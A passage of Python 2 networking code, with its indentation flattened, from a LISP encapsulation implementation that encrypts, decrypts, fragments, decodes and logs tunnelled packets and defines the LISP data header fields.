#enddef
def cipher_pad(self, packet):
length = len(packet)
if ((length % 16) != 0):
pad = ((length/16) + 1) * 16
packet = packet.ljust(pad)
#endif
return(packet)
#enddef
def encrypt(self, key, addr_str):
if (key == None or key.shared_key == None):
return([self.packet, False])
#endif
#
# Pad packet to multiple of 16 bytes and call AES cipher.
#
packet = self.cipher_pad(self.packet)
iv = key.get_iv()
ts = lisp_get_timestamp()
aead = None
if (key.cipher_suite == LISP_CS_25519_CHACHA):
encrypt = chacha.ChaCha(key.encrypt_key, iv).encrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
aesgcm = AES.new(k, AES.MODE_GCM, iv)
encrypt = aesgcm.encrypt
aead = aesgcm.digest
except:
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([self.packet, False])
#endtry
else:
k = binascii.unhexlify(key.encrypt_key)
encrypt = AES.new(k, AES.MODE_CBC, iv).encrypt
#endif
ciphertext = encrypt(packet)
if (ciphertext == None): return([self.packet, False])
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# GCM requires 16 bytes of an AEAD MAC tag at the end of the
# ciphertext. Needed to interoperate with the Go implemenation of
# AES-GCM. The MAC digest was computed above.
#
if (aead != None): ciphertext += aead()
#
# Compute ICV and append to packet. ICV covers the LISP header, the
# IV, and the cipertext.
#
self.lisp_header.key_id(key.key_id)
lisp = self.lisp_header.encode()
icv = key.do_icv(lisp + iv + ciphertext, iv)
ps = 4 if (key.do_poly) else 8
string = bold("Encrypt", False)
cipher_str = bold(key.cipher_suite_string, False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): 0x{}...{}".format(auth, icv[0:ps], icv[-ps::])
dprint("{} for key-id: {}, {}, {}, {}-time: {} usec".format( \
string, key.key_id, addr_str, icv_str, cipher_str, ts))
icv = int(icv, 16)
if (key.do_poly):
icv1 = byte_swap_64((icv >> 64) & LISP_8_64_MASK)
icv2 = byte_swap_64(icv & LISP_8_64_MASK)
icv = struct.pack("QQ", icv1, icv2)
else:
icv1 = byte_swap_64((icv >> 96) & LISP_8_64_MASK)
icv2 = byte_swap_64((icv >> 32) & LISP_8_64_MASK)
icv3 = socket.htonl(icv & 0xffffffff)
icv = struct.pack("QQI", icv1, icv2, icv3)
#endif
return([iv + ciphertext + icv, True])
#enddef
def decrypt(self, packet, header_length, key, addr_str):
#
# Do ICV first. If it succeeds, then decrypt. Get ICV from packet and
# truncate packet to run hash over. Compare packet hash with computed
# hash.
#
if (key.do_poly):
icv1, icv2 = struct.unpack("QQ", packet[-16::])
packet_icv = byte_swap_64(icv1) << 64
packet_icv |= byte_swap_64(icv2)
packet_icv = lisp_hex_string(packet_icv).zfill(32)
packet = packet[0:-16]
ps = 4
hash_str = bold("poly", False)
else:
icv1, icv2, icv3 = struct.unpack("QQI", packet[-20::])
packet_icv = byte_swap_64(icv1) << 96
packet_icv |= byte_swap_64(icv2) << 32
packet_icv |= socket.htonl(icv3)
packet_icv = lisp_hex_string(packet_icv).zfill(40)
packet = packet[0:-20]
ps = 8
hash_str = bold("sha", False)
#endif
lisp = self.lisp_header.encode()
#
# Get the IV and use it to decrypt and authenticate..
#
if (key.cipher_suite == LISP_CS_25519_CHACHA):
iv_len = 8
cipher_str = bold("chacha", False)
elif (key.cipher_suite == LISP_CS_25519_GCM):
iv_len = 12
cipher_str = bold("aes-gcm", False)
else:
iv_len = 16
cipher_str = bold("aes-cbc", False)
#endif
iv = packet[0:iv_len]
#
# Compute ICV over LISP header and packet payload.
#
computed_icv = key.do_icv(lisp + packet, iv)
p_icv = "0x{}...{}".format(packet_icv[0:ps], packet_icv[-ps::])
c_icv = "0x{}...{}".format(computed_icv[0:ps], computed_icv[-ps::])
if (computed_icv != packet_icv):
self.packet_error = "ICV-error"
funcs = cipher_str + "/" + hash_str
fail = bold("ICV failed ({})".format(funcs), False)
icv_str = "packet-ICV {} != computed-ICV {}".format(p_icv, c_icv)
dprint(("{} from RLOC {}, receive-port: {}, key-id: {}, " + \
"packet dropped, {}").format(fail, red(addr_str, False),
self.udp_sport, key.key_id, icv_str))
dprint("{}".format(key.print_keys()))
#
# This is the 4-tuple NAT case. There another addr:port that
# should have the crypto-key the encapsulator is using. This is
# typically done on the RTR.
#
lisp_retry_decap_keys(addr_str, lisp + packet, iv, packet_icv)
return([None, False])
#endif
#
# Advance over IV for decryption.
#
packet = packet[iv_len::]
#
# Call AES or chacha cipher. Make sure for AES that
#
ts = lisp_get_timestamp()
if (key.cipher_suite == LISP_CS_25519_CHACHA):
decrypt = chacha.ChaCha(key.encrypt_key, iv).decrypt
elif (key.cipher_suite == LISP_CS_25519_GCM):
k = binascii.unhexlify(key.encrypt_key)
try:
decrypt = AES.new(k, AES.MODE_GCM, iv).decrypt
except:
self.packet_error = "no-decrypt-key"
lprint("You need AES-GCM, do a 'pip install pycryptodome'")
return([None, False])
#endtry
else:
if ((len(packet) % 16) != 0):
dprint("Ciphertext not multiple of 16 bytes, packet dropped")
return([None, False])
#endif
k = binascii.unhexlify(key.encrypt_key)
decrypt = AES.new(k, AES.MODE_CBC, iv).decrypt
#endif
plaintext = decrypt(packet)
ts = int(str(time.time() - ts).split(".")[1][0:6])
#
# Now decrypt packet and return plaintext payload.
#
string = bold("Decrypt", False)
addr_str = "RLOC: " + red(addr_str, False)
auth = "poly" if key.do_poly else "sha256"
auth = bold(auth, False)
icv_str = "ICV({}): {}".format(auth, p_icv)
dprint("{} for key-id: {}, {}, {} (good), {}-time: {} usec". \
format(string, key.key_id, addr_str, icv_str, cipher_str, ts))
#
# Keep self.packet the outer header, UDP header, and LISP header.
# We will append the plaintext in the caller once we parse the inner
# packet length so we can truncate any padding the encryptor put on.
#
self.packet = self.packet[0:header_length]
return([plaintext, True])
#enddef
def fragment_outer(self, outer_hdr, inner_packet):
frag_len = 1000
#
# Break up packet payload in fragments and put in array to have
# IP header added in next loop below.
#
frags = []
offset = 0
length = len(inner_packet)
while (offset < length):
frag = inner_packet[offset::]
if (len(frag) > frag_len): frag = frag[0:frag_len]
frags.append(frag)
offset += len(frag)
#endwhile
#
# Now fix outer IPv4 header with fragment-offset values and add the
# IPv4 value.
#
fragments = []
offset = 0
for frag in frags:
#
# Set frag-offset field in outer IPv4 header.
#
fo = offset if (frag == frags[-1]) else 0x2000 + offset
fo = socket.htons(fo)
outer_hdr = outer_hdr[0:6] + struct.pack("H", fo) + outer_hdr[8::]
#
# Set total-length field in outer IPv4 header and checksum.
#
l = socket.htons(len(frag) + 20)
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragments.append(outer_hdr + frag)
offset += len(frag) / 8
#endfor
return(fragments)
#enddef
def fragment(self):
packet = self.fix_outer_header(self.packet)
#
# If inner header is IPv4, we will fragment the inner header and encap
# each fragment. If the inner header is IPv6, we will not add the
# Fragmentation Header into the inner IPv6 packet.
#
length = len(packet)
if (length <= 1500): return([packet], "Fragment-None")
packet = self.packet
#
# Fragment outer IPv4 header if inner packet is IPv6 (or Mac frame).
# We cannot fragment IPv6 packet since we are not the source.
#
if (self.inner_version != 4):
ident = random.randint(0, 0xffff)
outer_hdr = packet[0:4] + struct.pack("H", ident) + packet[6:20]
inner_packet = packet[20::]
fragments = self.fragment_outer(outer_hdr, inner_packet)
return(fragments, "Fragment-Outer")
#endif
#
# Fragment inner IPv4 packet.
#
outer_hdr_len = 56 if (self.outer_version == 6) else 36
outer_hdr = packet[0:outer_hdr_len]
inner_hdr = packet[outer_hdr_len: outer_hdr_len + 20]
inner_packet = packet[outer_hdr_len + 20::]
#
# If DF-bit is set, don't fragment packet.
#
frag_field = struct.unpack("H", inner_hdr[6:8])[0]
frag_field = socket.ntohs(frag_field)
if (frag_field & 0x4000):
df_bit = bold("DF-bit set", False)
dprint("{} in inner header, packet discarded".format(df_bit))
return([], "Fragment-None-DF-bit")
#endif
offset = 0
length = len(inner_packet)
fragments = []
while (offset < length):
fragments.append(inner_packet[offset:offset+1400])
offset += 1400
#endwhile
#
# Now put inner header and outer header on each fragment.
#
frags = fragments
fragments = []
mf = True if frag_field & 0x2000 else False
frag_field = (frag_field & 0x1fff) * 8
for frag in frags:
#
# Set fragment-offset and MF bit if not last fragment.
#
ff = frag_field / 8
if (mf):
ff |= 0x2000
elif (frag != frags[-1]):
ff |= 0x2000
#endif
ff = socket.htons(ff)
inner_hdr = inner_hdr[0:6] + struct.pack("H", ff) + inner_hdr[8::]
#
# Set length of fragment, set up offset for next fragment-offset,
# and header checksum fragment packet. Then prepend inner header
# to payload.
#
length = len(frag)
frag_field += length
l = socket.htons(length + 20)
inner_hdr = inner_hdr[0:2] + struct.pack("H", l) + \
inner_hdr[4:10] + struct.pack("H", 0) + inner_hdr[12::]
inner_hdr = lisp_ip_checksum(inner_hdr)
fragment = inner_hdr + frag
#
# Change outer header length and header checksum if IPv4 outer
# header. If IPv6 outer header, raw sockets prepends the header.
#
length = len(fragment)
if (self.outer_version == 4):
l = length + outer_hdr_len
length += 16
outer_hdr = outer_hdr[0:2] + struct.pack("H", l) + \
outer_hdr[4::]
outer_hdr = lisp_ip_checksum(outer_hdr)
fragment = outer_hdr + fragment
fragment = self.fix_outer_header(fragment)
#endif
#
# Finally fix outer UDP header length. Byte-swap it.
#
udp_len_index = outer_hdr_len - 12
l = socket.htons(length)
fragment = fragment[0:udp_len_index] + struct.pack("H", l) + \
fragment[udp_len_index+2::]
fragments.append(fragment)
#endfor
return(fragments, "Fragment-Inner")
#enddef
def fix_outer_header(self, packet):
#
# IP_HDRINCL requires the total-length and frag-offset fields to be
# in host byte order. So have to byte-swapped here. But when testing
# we (UPC guys) discovered the frag field didn't need swapping. The
# conclusion is that byte-swapping is necessary for MacOS but not for
# Linux OSes.
#
if (self.outer_version == 4 or self.inner_version == 4):
if (lisp_is_macos()):
packet = packet[0:2] + packet[3] + packet[2] + packet[4:6] + \
packet[7] + packet[6] + packet[8::]
else:
packet = packet[0:2] + packet[3] + packet[2] + packet[4::]
#endif
#endif
return(packet)
#enddef
def send_packet(self, lisp_raw_socket, dest):
if (lisp_flow_logging and dest != self.inner_dest): self.log_flow(True)
dest = dest.print_address_no_iid()
fragments, in_or_out = self.fragment()
for fragment in fragments:
if (len(fragments) != 1):
self.packet = fragment
self.print_packet(in_or_out, True)
#endif
try: lisp_raw_socket.sendto(fragment, (dest, 0))
except socket.error, e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
#endfor
#enddef
def send_l2_packet(self, l2_socket, mac_header):
if (l2_socket == None):
lprint("No layer-2 socket, drop IPv6 packet")
return
#endif
if (mac_header == None):
lprint("Could not build MAC header, drop IPv6 packet")
return
#endif
packet = mac_header + self.packet
# try: l2_socket.send(packet)
# except socket.error, e:
# lprint("send_l2_packet(): socket.send() failed: {}".format(e))
# #endtry
# return
#
# Use tuntap tunnel interface instead of raw sockets for IPv6
# decapsulated packets.
#
l2_socket.write(packet)
return
#enddef
def bridge_l2_packet(self, eid, db):
try: dyn_eid = db.dynamic_eids[eid.print_address_no_iid()]
except: return
try: interface = lisp_myinterfaces[dyn_eid.interface]
except: return
try:
socket = interface.get_bridge_socket()
if (socket == None): return
except: return
try: socket.send(self.packet)
except socket.error, e:
lprint("bridge_l2_packet(): socket.send() failed: {}".format(e))
#endtry
#enddef
def decode(self, is_lisp_packet, lisp_ipc_socket, stats):
self.packet_error = ""
packet = self.packet
orig_len = len(packet)
L3 = L2 = True
#
# Get version number of outer header so we can decode outer addresses.
#
header_len = 0
iid = self.lisp_header.get_instance_id()
if (is_lisp_packet):
version = struct.unpack("B", packet[0:1])[0]
self.outer_version = version >> 4
if (self.outer_version == 4):
#
# MacOS is zeroing the IP header checksum for a raw socket.
# If we receive this, bypass the checksum calculation.
#
orig_checksum = struct.unpack("H", packet[10:12])[0]
packet = lisp_ip_checksum(packet)
checksum = struct.unpack("H", packet[10:12])[0]
if (checksum != 0):
if (orig_checksum != 0 or lisp_is_macos() == False):
self.packet_error = "checksum-error"
if (stats):
stats[self.packet_error].increment(orig_len)
#endif
lprint("IPv4 header checksum failed for outer header")
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
afi = LISP_AFI_IPV4
offset = 12
self.outer_tos = struct.unpack("B", packet[1:2])[0]
self.outer_ttl = struct.unpack("B", packet[8:9])[0]
header_len = 20
elif (self.outer_version == 6):
afi = LISP_AFI_IPV6
offset = 8
tos = struct.unpack("H", packet[0:2])[0]
self.outer_tos = (socket.ntohs(tos) >> 4) & 0xff
self.outer_ttl = struct.unpack("B", packet[7:8])[0]
header_len = 40
else:
self.packet_error = "outer-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode outer header")
return(None)
#endif
self.outer_source.afi = afi
self.outer_dest.afi = afi
addr_length = self.outer_source.addr_length()
self.outer_source.unpack_address(packet[offset:offset+addr_length])
offset += addr_length
self.outer_dest.unpack_address(packet[offset:offset+addr_length])
packet = packet[header_len::]
self.outer_source.mask_len = self.outer_source.host_mask_len()
self.outer_dest.mask_len = self.outer_dest.host_mask_len()
#
# Get UDP fields
#
short = struct.unpack("H", packet[0:2])[0]
self.udp_sport = socket.ntohs(short)
short = struct.unpack("H", packet[2:4])[0]
self.udp_dport = socket.ntohs(short)
short = struct.unpack("H", packet[4:6])[0]
self.udp_length = socket.ntohs(short)
short = struct.unpack("H", packet[6:8])[0]
self.udp_checksum = socket.ntohs(short)
packet = packet[8::]
#
# Determine what is inside, a packet or a frame.
#
L3 = (self.udp_dport == LISP_DATA_PORT or
self.udp_sport == LISP_DATA_PORT)
L2 = (self.udp_dport in (LISP_L2_DATA_PORT, LISP_VXLAN_DATA_PORT))
#
# Get LISP header fields.
#
if (self.lisp_header.decode(packet) == False):
self.packet_error = "lisp-header-error"
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
lprint("Cannot decode LISP header")
return(None)
#endif
packet = packet[8::]
iid = self.lisp_header.get_instance_id()
header_len += 16
#endif
if (iid == 0xffffff): iid = 0
#
# Time to decrypt if K-bits set.
#
decrypted = False
key_id = self.lisp_header.k_bits
if (key_id):
addr_str = lisp_get_crypto_decap_lookup_key(self.outer_source,
self.udp_sport)
if (addr_str == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} for key-id {} to decrypt packet".format(ks, key_id))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
key = lisp_crypto_keys_by_rloc_decap[addr_str][key_id]
if (key == None):
self.packet_error = "no-decrypt-key"
if (stats): stats[self.packet_error].increment(orig_len)
self.print_packet("Receive", is_lisp_packet)
ks = bold("No key available", False)
dprint("{} to decrypt packet from RLOC {}".format(ks,
red(addr_str, False)))
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#
# Decrypt and continue processing inner header.
#
key.use_count += 1
packet, decrypted = self.decrypt(packet, header_len, key,
addr_str)
if (decrypted == False):
if (stats): stats[self.packet_error].increment(orig_len)
if (lisp_flow_logging): self.log_flow(False)
return(None)
#endif
#endif
#
# Get inner header fields.
#
version = struct.unpack("B", packet[0:1])[0]
self.inner_version = version >> 4
if (L3 and self.inner_version == 4 and version >= 0x45):
packet_len = socket.ntohs(struct.unpack("H", packet[2:4])[0])
self.inner_tos = struct.unpack("B", packet[1:2])[0]
self.inner_ttl = struct.unpack("B", packet[8:9])[0]
self.inner_protocol = struct.unpack("B", packet[9:10])[0]
self.inner_source.afi = LISP_AFI_IPV4
self.inner_dest.afi = LISP_AFI_IPV4
self.inner_source.unpack_address(packet[12:16])
self.inner_dest.unpack_address(packet[16:20])
frag_field = socket.ntohs(struct.unpack("H", packet[6:8])[0])
self.inner_is_fragment = (frag_field & 0x2000 or frag_field != 0)
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[20:22])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[22:24])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L3 and self.inner_version == 6 and version >= 0x60):
packet_len = socket.ntohs(struct.unpack("H", packet[4:6])[0]) + 40
tos = struct.unpack("H", packet[0:2])[0]
self.inner_tos = (socket.ntohs(tos) >> 4) & 0xff
self.inner_ttl = struct.unpack("B", packet[7:8])[0]
self.inner_protocol = struct.unpack("B", packet[6:7])[0]
self.inner_source.afi = LISP_AFI_IPV6
self.inner_dest.afi = LISP_AFI_IPV6
self.inner_source.unpack_address(packet[8:24])
self.inner_dest.unpack_address(packet[24:40])
if (self.inner_protocol == LISP_UDP_PROTOCOL):
self.inner_sport = struct.unpack("H", packet[40:42])[0]
self.inner_sport = socket.ntohs(self.inner_sport)
self.inner_dport = struct.unpack("H", packet[42:44])[0]
self.inner_dport = socket.ntohs(self.inner_dport)
#endif
elif (L2):
packet_len = len(packet)
self.inner_tos = 0
self.inner_ttl = 0
self.inner_protocol = 0
self.inner_source.afi = LISP_AFI_MAC
self.inner_dest.afi = LISP_AFI_MAC
self.inner_dest.unpack_address(self.swap_mac(packet[0:6]))
self.inner_source.unpack_address(self.swap_mac(packet[6:12]))
elif (self.lisp_header.get_instance_id() == 0xffffff):
if (lisp_flow_logging): self.log_flow(False)
return(self)
else:
self.packet_error = "bad-inner-version"
if (stats): stats[self.packet_error].increment(orig_len)
lprint("Cannot decode encapsulation, header version {}".format(\
hex(version)))
packet = lisp_format_packet(packet[0:20])
lprint("Packet header: {}".format(packet))
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(None)
#endif
self.inner_source.mask_len = self.inner_source.host_mask_len()
self.inner_dest.mask_len = self.inner_dest.host_mask_len()
self.inner_source.instance_id = iid
self.inner_dest.instance_id = iid
#
# If we are configured to do Nonce-Echoing, do lookup on source-EID
# to obtain source RLOC to store nonce to echo.
#
if (lisp_nonce_echoing and is_lisp_packet):
echo_nonce = lisp_get_echo_nonce(self.outer_source, None)
if (echo_nonce == None):
rloc_str = self.outer_source.print_address_no_iid()
echo_nonce = lisp_echo_nonce(rloc_str)
#endif
nonce = self.lisp_header.get_nonce()
if (self.lisp_header.is_e_bit_set()):
echo_nonce.receive_request(lisp_ipc_socket, nonce)
elif (echo_nonce.request_nonce_sent):
echo_nonce.receive_echo(lisp_ipc_socket, nonce)
#endif
#endif
#
# If we decrypted, we may have to truncate packet if the encrypter
# padded the packet.
#
if (decrypted): self.packet += packet[:packet_len]
#
# Log a packet that was parsed correctly.
#
if (lisp_flow_logging and is_lisp_packet): self.log_flow(False)
return(self)
#enddef
def swap_mac(self, mac):
return(mac[1] + mac[0] + mac[3] + mac[2] + mac[5] + mac[4])
#enddef
def strip_outer_headers(self):
offset = 16
offset += 20 if (self.outer_version == 4) else 40
self.packet = self.packet[offset::]
return(self)
#enddef
def hash_ports(self):
packet = self.packet
version = self.inner_version
hashval = 0
if (version == 4):
protocol = struct.unpack("B", packet[9])[0]
if (self.inner_is_fragment): return(protocol)
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[20:24])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
if (version == 6):
protocol = struct.unpack("B", packet[6])[0]
if (protocol in [6, 17]):
hashval = protocol
hashval += struct.unpack("I", packet[40:44])[0]
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
#endif
return(hashval)
#enddef
def hash_packet(self):
hashval = self.inner_source.address ^ self.inner_dest.address
hashval += self.hash_ports()
if (self.inner_version == 4):
hashval = (hashval >> 16) ^ (hashval & 0xffff)
elif (self.inner_version == 6):
hashval = (hashval >> 64) ^ (hashval & 0xffffffffffffffff)
hashval = (hashval >> 32) ^ (hashval & 0xffffffff)
hashval = (hashval >> 16) ^ (hashval & 0xffff)
#endif
self.udp_sport = 0xf000 | (hashval & 0xfff)
#enddef
def print_packet(self, s_or_r, is_lisp_packet):
if (is_lisp_packet == False):
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(("{} {}, tos/ttl: {}/{}, length: {}, packet: {} ..."). \
format(bold(s_or_r, False),
green(iaddr_str, False), self.inner_tos,
self.inner_ttl, len(self.packet),
lisp_format_packet(self.packet[0:60])))
return
#endif
if (s_or_r.find("Receive") != -1):
ed = "decap"
ed += "-vxlan" if self.udp_dport == LISP_VXLAN_DATA_PORT else ""
else:
ed = s_or_r
if (ed in ["Send", "Replicate"] or ed.find("Fragment") != -1):
ed = "encap"
#endif
#endif
oaddr_str = "{} -> {}".format(self.outer_source.print_address_no_iid(),
self.outer_dest.print_address_no_iid())
#
# Special case where Info-Request is inside of a 4341 packet for
# NAT-traversal.
#
if (self.lisp_header.get_instance_id() == 0xffffff):
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, ")
line += bold("control-packet", False) + ": {} ..."
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport,
self.udp_dport, lisp_format_packet(self.packet[0:56])))
return
else:
line = ("{} LISP packet, outer RLOCs: {}, outer tos/ttl: " + \
"{}/{}, outer UDP: {} -> {}, inner EIDs: {}, " + \
"inner tos/ttl: {}/{}, length: {}, {}, packet: {} ...")
#endif
if (self.lisp_header.k_bits):
if (ed == "encap"): ed = "encrypt/encap"
if (ed == "decap"): ed = "decap/decrypt"
#endif
iaddr_str = "{} -> {}".format(self.inner_source.print_address(),
self.inner_dest.print_address())
dprint(line.format(bold(s_or_r, False), red(oaddr_str, False),
self.outer_tos, self.outer_ttl, self.udp_sport, self.udp_dport,
green(iaddr_str, False), self.inner_tos, self.inner_ttl,
len(self.packet), self.lisp_header.print_header(ed),
lisp_format_packet(self.packet[0:56])))
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.inner_source, self.inner_dest))
#enddef
def get_raw_socket(self):
iid = str(self.lisp_header.get_instance_id())
if (iid == "0"): return(None)
if (lisp_iid_to_interface.has_key(iid) == False): return(None)
interface = lisp_iid_to_interface[iid]
s = interface.get_socket()
if (s == None):
string = bold("SO_BINDTODEVICE", False)
enforce = (os.getenv("LISP_ENFORCE_BINDTODEVICE") != None)
lprint("{} required for multi-tenancy support, {} packet".format( \
string, "drop" if enforce else "forward"))
if (enforce): return(None)
#endif
iid = bold(iid, False)
d = bold(interface.device, False)
dprint("Send packet on instance-id {} interface {}".format(iid, d))
return(s)
#enddef
def log_flow(self, encap):
global lisp_flow_log
dump = os.path.exists("./log-flows")
if (len(lisp_flow_log) == LISP_FLOW_LOG_SIZE or dump):
args = [lisp_flow_log]
lisp_flow_log = []
threading.Thread(target=lisp_write_flow_log, args=args).start()
if (dump): os.system("rm ./log-flows")
return
#endif
ts = datetime.datetime.now()
lisp_flow_log.append([ts, encap, self.packet, self])
#endif
def print_flow(self, ts, encap, packet):
ts = ts.strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
flow = "{}: {}".format(ts, "encap" if encap else "decap")
osrc = red(self.outer_source.print_address_no_iid(), False)
odst = red(self.outer_dest.print_address_no_iid(), False)
isrc = green(self.inner_source.print_address(), False)
idst = green(self.inner_dest.print_address(), False)
if (self.lisp_header.get_instance_id() == 0xffffff):
flow += " {}:{} -> {}:{}, LISP control message type {}\n"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
self.inner_version)
return(flow)
#endif
if (self.outer_dest.is_null() == False):
flow += " {}:{} -> {}:{}, len/tos/ttl {}/{}/{}"
flow = flow.format(osrc, self.udp_sport, odst, self.udp_dport,
len(packet), self.outer_tos, self.outer_ttl)
#endif
#
# Can't look at inner header if encrypted. Protecting user privacy.
#
if (self.lisp_header.k_bits != 0):
error = "\n"
if (self.packet_error != ""):
error = " ({})".format(self.packet_error) + error
#endif
flow += ", encrypted" + error
return(flow)
#endif
#
# Position to inner header.
#
if (self.outer_dest.is_null() == False):
packet = packet[36::] if self.outer_version == 4 else packet[56::]
#endif
protocol = packet[9] if self.inner_version == 4 else packet[6]
protocol = struct.unpack("B", protocol)[0]
flow += " {} -> {}, len/tos/ttl/prot {}/{}/{}/{}"
flow = flow.format(isrc, idst, len(packet), self.inner_tos,
self.inner_ttl, protocol)
#
# Show some popular transport layer data.
#
if (protocol in [6, 17]):
ports = packet[20:24] if self.inner_version == 4 else packet[40:44]
if (len(ports) == 4):
ports = socket.ntohl(struct.unpack("I", ports)[0])
flow += ", ports {} -> {}".format(ports >> 16, ports & 0xffff)
#endif
elif (protocol == 1):
seq = packet[26:28] if self.inner_version == 4 else packet[46:48]
if (len(seq) == 2):
seq = socket.ntohs(struct.unpack("H", seq)[0])
flow += ", icmp-seq {}".format(seq)
#endif
#endof
if (self.packet_error != ""):
flow += " ({})".format(self.packet_error)
#endif
flow += "\n"
return(flow)
#endif
def is_trace(self):
ports = [self.inner_sport, self.inner_dport]
return(self.inner_protocol == LISP_UDP_PROTOCOL and
LISP_TRACE_PORT in ports)
#enddef
#endclass
#
# LISP encapsulation header definition.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4341 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L |N|L|E|V|I|P|K|K| Nonce/Map-Version |
# I \ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# S / | Instance ID/Locator-Status-Bits |
# P +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_N_BIT = 0x80000000
LISP_L_BIT = 0x40000000
LISP_E_BIT = 0x20000000
LISP_V_BIT = 0x10000000
LISP_I_BIT = 0x08000000
LISP_P_BIT = 0x04000000
LISP_K_BITS = 0x03000000
class lisp_data_header():
def __init__(self):
self.first_long = 0
self.second_long = 0
self.k_bits = 0
#enddef
def print_header(self, e_or_d):
first_long = lisp_hex_string(self.first_long & 0xffffff)
second_long = lisp_hex_string(self.second_long).zfill(8)
line = ("{} LISP-header -> flags: {}{}{}{}{}{}{}{}, nonce: {}, " + \
"iid/lsb: {}")
return(line.format(bold(e_or_d, False),
"N" if (self.first_long & LISP_N_BIT) else "n",
"L" if (self.first_long & LISP_L_BIT) else "l",
"E" if (self.first_long & LISP_E_BIT) else "e",
"V" if (self.first_long & LISP_V_BIT) else "v",
"I" if (self.first_long & LISP_I_BIT) else "i",
"P" if (self.first_long & LISP_P_BIT) else "p",
"K" if (self.k_bits in [2,3]) else "k",
"K" if (self.k_bits in [1,3]) else "k",
first_long, second_long))
#enddef
def encode(self):
packet_format = "II"
first_long = socket.htonl(self.first_long)
second_long = socket.htonl(self.second_long)
header = struct.pack(packet_format, first_long, second_long)
return(header)
#enddef
def decode(self, packet):
packet_format = "II"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(False)
first_long, second_long = \
struct.unpack(packet_format, packet[:format_size])
self.first_long = socket.ntohl(first_long)
self.second_long = socket.ntohl(second_long)
self.k_bits = (self.first_long & LISP_K_BITS) >> 24
return(True)
#enddef
def key_id(self, key_id):
self.first_long &= ~(0x3 << 24)
self.first_long |= ((key_id & 0x3) << 24)
self.k_bits = key_id
#enddef
def nonce(self, nonce):
self.first_long |= LISP_N_BIT
self.first_long |= nonce
#enddef
def map_version(self, version):
self.first_long |= LISP_V_BIT
self.first_long |= version
#enddef
def instance_id(self, iid):
if (iid == 0): return
self.first_long |= LISP_I_BIT
self.second_long &= 0xff
self.second_long |= (iid << 8)
#enddef
def get_instance_id(self):
return((self.second_long >> 8) & 0xffffff)
#enddef
def locator_status_bits(self, lsbs):
self.first_long |= LISP_L_BIT
self.second_long &= 0xffffff00
self.second_long |= (lsbs & 0xff)
#enddef
def is_request_nonce(self, nonce):
return(nonce & 0x80000000)
#enddef
def request_nonce(self, nonce):
self.first_long |= LISP_E_BIT
self.first_long |= LISP_N_BIT
self.first_long |= (nonce & 0xffffff)
#enddef
def is_e_bit_set(self):
return(self.first_long & LISP_E_BIT)
#enddef
def get_nonce(self):
return(self.first_long & 0xffffff)
#enddef
#endclass
class lisp_echo_nonce():
def __init__(self, rloc_str):
self.rloc_str = rloc_str
self.rloc = lisp_address(LISP_AFI_NONE, rloc_str, 0, 0)
self.request_nonce_sent = None
self.echo_nonce_sent = None
self.last_request_nonce_sent = None
self.last_new_request_nonce_sent = None
self.last_echo_nonce_sent = None
self.last_new_echo_nonce_sent = None
self.request_nonce_rcvd = None
self.echo_nonce_rcvd = None
self.last_request_nonce_rcvd = None
self.last_echo_nonce_rcvd = None
self.last_good_echo_nonce_rcvd = None
lisp_nonce_echo_list[rloc_str] = self
#enddef
def send_ipc(self, ipc_socket, ipc):
source = "lisp-itr" if lisp_i_am_itr else "lisp-etr"
dest = "lisp-etr" if lisp_i_am_itr else "lisp-itr"
ipc = lisp_command_ipc(ipc, source)
lisp_ipc(ipc, ipc_socket, dest)
#enddef
def send_request_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
ipc = "nonce%R%{}%{}".format(self.rloc_str, nonce)
self.send_ipc(ipc_socket, ipc)
#enddef
def send_echo_ipc(self, ipc_socket, nonce):
nonce = lisp_hex_string(nonce)
